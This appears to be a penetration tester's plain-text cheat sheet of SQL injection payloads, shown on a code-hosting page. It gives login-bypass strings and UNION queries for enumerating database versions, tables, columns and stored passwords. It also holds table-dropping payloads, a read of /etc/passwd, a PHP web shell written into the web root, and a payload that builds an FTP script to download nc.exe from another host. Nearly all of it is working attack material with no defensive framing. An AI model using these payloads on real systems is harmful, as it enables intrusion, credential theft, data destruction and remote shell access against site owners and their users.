PTZ/profile_files/.ptz/v3das/web_injection_sqli.txt

44 lines
1.6 KiB
Plaintext
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

SQLi notes
==========
Login bypass
any' or 1=1 limit 1 ;#
' OR '1' = '1 / ' OR '1' = '1
;# ;-- #
?id=737 order by 6 --> Testing max columns
?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database
?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits?
?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration
?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration
?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info
More examples
x%') #
x%') or 1=1 #
x%') order by 4 #
x%') union select all 4 #
x%') union select all 1,2,3@@version #
x%') and 1=1 #
x%') and UNION ALL SELECT LOAD_FILE(/etc/passwd) #
x%') and drop table if exists customers #
x%') and create database test #
x%') ; DROP ALL TABLES; #
@@hostname
wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
Adding backdor.php
?id=737 union select all 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
Getting a shell with php execute
192.168.3.1/comment.php?id=737 union select all 1,2,3,4,"<? system('echo open 192.168.1.9 21 > ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo bin >> ftp.txt'); ?><? system('echo GET nc.exe >> ftp.txt'); ?><? system('echo bye >> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'